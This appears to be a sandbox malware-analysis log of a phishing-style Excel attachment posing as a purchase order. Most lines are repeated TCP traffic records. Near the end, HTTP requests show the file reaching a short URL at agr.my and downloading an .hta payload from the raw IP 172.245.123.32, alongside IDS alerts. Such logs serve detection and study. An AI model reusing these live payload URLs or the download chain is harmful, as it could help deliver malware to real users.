Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: Joe Sandbox ViewIP Address: 147.79.86.93 147.79.86.93
Source: Joe Sandbox ViewIP Address: 13.107.246.41 13.107.246.41
Source: Joe Sandbox ViewIP Address: 13.107.246.41 13.107.246.41
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 13.107.246.41:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 13.107.246.41:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficHTTP traffic detected: GET /vJcD8F?&silk=enthusiastic HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: agr.myConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /vJcD8F?&silk=enthusiastic HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: agr.myConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.123.32
Source: global trafficDNS traffic detected: DNS query: agr.my
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: PURCHASE ORDER 517-2025.xla.xlsxString found in binary or memory: https://agr.my/vJcD8F?&silk=enthusiastic
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
